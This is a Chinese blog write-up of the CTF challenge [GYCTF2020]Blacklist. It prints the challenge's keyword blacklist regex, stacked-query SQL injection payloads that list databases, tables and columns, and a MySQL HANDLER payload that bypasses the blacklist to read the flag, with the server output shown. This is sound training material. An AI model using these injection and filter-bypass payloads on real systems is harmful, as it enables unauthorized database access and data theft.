[GYCTF2020]Blacklist -堆叠查询- buu刷题笔记

01129

启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it

随便输入几个关键词试试:select,他爆出来所有的黑名单关键词,本来还想fuzz跑一下的

return preg_match(\"/set|prepare|alter|rename|select|update|delete|drop|insert|where|\\./i\",$inject);

联合注入不行,就尝试尝试堆叠查询,看来CTF也很喜欢考这类型的题目呀!

首先爆出数据库:1\';show databases;

array(1) {
  [0]=>
  string(11) \"ctftraining\"
}

array(1) {
  [0]=>
  string(18) \"information_schema\"
}

array(1) {
  [0]=>
  string(5) \"mysql\"
}

array(1) {
  [0]=>
  string(18) \"performance_schema\"
}

array(1) {
  [0]=>
  string(9) \"supersqli\"
}

array(1) {
  [0]=>
  string(4) \"test\"
}

接着爆出表名:1\';show tables;

array(1) {
  [0]=>
  string(8) \"FlagHere\"
}

array(1) {
  [0]=>
  string(5) \"words\"
}

然后查询列表信息:1\';show columns from FlagHere;

array(6) {
  [0]=>
  string(4) \"flag\"
  [1]=>
  string(12) \"varchar(100)\"
  [2]=>
  string(2) \"NO\"
  [3]=>
  string(0) \"\"
  [4]=>
  NULL
  [5]=>
  string(0) \"\"
}

接下来的才是重点,在MYSQL数据库中:

  1. 可以用handler 【表名】 open来打开某个表
  2. 然后就可以在里面用handler 【表名】 read 【获取第几行】来获取该数据库里面的数据了
  3. 最后再利用handler【表名】 close来关闭

所以根据已知的信息可以构造payload为:

1\';
handler FlagHere open;
handler FlagHere read first;
handler FlagHere close;

array(1) {
  [0]=>
  string(42) \"flag{bc0dd949-5b62-41c7-85c5-95662641a510}\"
}

最终获得flag为flag{bc0dd949-5b62-41c7-85c5-95662641a510}

------本文已结束,感谢您的阅读------
THE END
技术教程
# 白帽黑客# buu# [GYCTF2020]# Blacklist# 堆叠查询
喜欢就支持一下吧
点赞9 分享
C语言教程的头像,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
5个月前 284
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】,网络安全爱好者中心-神域博客网
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
5个月前 253
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
5个月前 239
记一次常规安全监测发现的挂马暗链,网络安全爱好者中心-神域博客网
记一次常规安全监测发现的挂马暗链
记一次常规安全监测发现的挂马暗链
5个月前 239
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞,网络安全爱好者中心-神域博客网
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
5个月前 218
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license,网络安全爱好者中心-神域博客网
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
5个月前 165
相关推荐
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
5个月前 284
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】,网络安全爱好者中心-神域博客网
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
5个月前 253
记一次常规安全监测发现的挂马暗链,网络安全爱好者中心-神域博客网
记一次常规安全监测发现的挂马暗链
记一次常规安全监测发现的挂马暗链
5个月前 239
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
5个月前 239
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞,网络安全爱好者中心-神域博客网
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
5个月前 218
[GYCTF2020]Blacklist -堆叠查询- buu刷题笔记,网络安全爱好者中心-神域博客网
[GYCTF2020]Blacklist -堆叠查询- buu刷题笔记
[GYCTF2020]Blacklist -堆叠查询- buu刷题笔记
5个月前 112
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
常用语
请选择评论常用语:
  • 1、谢谢博主分享!
  • 2、博主NB,666
  • 3、感谢楼主分享!
  • 4、感谢大佬分享!
  • 5、教程很好用,谢谢!
 夸夸
夸夸
还有吗!没看够!
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
图片

    暂无评论内容